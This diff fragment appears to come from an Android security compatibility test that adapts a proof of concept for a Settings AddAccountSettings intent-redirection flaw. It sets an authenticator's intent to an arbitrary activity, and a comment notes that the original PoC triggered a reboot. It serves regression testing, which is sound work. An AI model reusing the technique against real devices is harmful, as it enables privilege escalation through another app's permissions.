+ public void accountSettings() {
+ Log.d(TAG, "accountSettings() start");
+
+ //replaces intent.setAction(Intent.ACTION_REBOOT) in original Poc
+ Intent arbitraryIntent = new Intent(mContext, TestActivity.class);
+
+ //Patched device is not supposed to process that intent
+ Authenticator.mIntent = arbitraryIntent;
+
+ Intent intent = new Intent();
+ intent.setComponent(new ComponentName(
+ "com.android.settings",
+ "com.android.settings.accounts.AddAccountSettings"));
+ intent.setAction(Intent.ACTION_RUN);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String authTypes[] = {"android.security.cts"};
+
+ intent.putExtra("account_types", authTypes);
+ mContext.startActivity(intent);
+ Log.d(TAG, "accountSettings() end");
+ }
+}
